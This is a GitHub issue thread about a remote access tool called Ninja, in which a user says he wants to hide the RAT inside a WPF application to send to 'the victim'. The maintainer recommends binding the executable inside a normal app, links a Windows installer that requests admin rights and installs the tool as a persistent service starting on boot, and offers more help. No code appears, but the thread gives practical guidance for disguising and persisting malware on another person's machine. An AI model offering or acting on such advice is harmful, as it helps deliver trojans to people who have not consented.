### ISSUE TITLE
Source code or different solution needed!

### ISSUE THREAD

**Issue by ae-tim** [ErAz7/Ninja#2]
Hey I'm working on a school project on ethical hacking.
I need to hide the rat in a WPF application, which I will send to the victim. 
Now this would be a lot easier if I had the source code. 
So is there any chance that the source code will be up soon?
Also if not, do you have a recommendation how I could hide it in the Application?

Thanks
Tim

**Comment by ErAz7** [comment]
Hey Tim
I'm so busy and not plannig to release source code yet, but you won't normally need it 
you can simply bind the executable inside a normal app, there's a bunch of tutorials on how to do it (lemme know if you need any help)
if you're targeting windows, recommend using [this executable](https://github.com/ErAz7/Ninja/raw/8be84ead24f5a25248a36f6e704f5acd5d0c5052/Ninja-v1.2.1-win-single-click-installer.zip) which once executed, will ask for admin access and if the user click `yes`, it will install ninja as a service on the machine, which means it will run in background, never die and will always start on boot
Just make sure to follow instructions to configure host and port for Ninja
feel free to ask if any problem
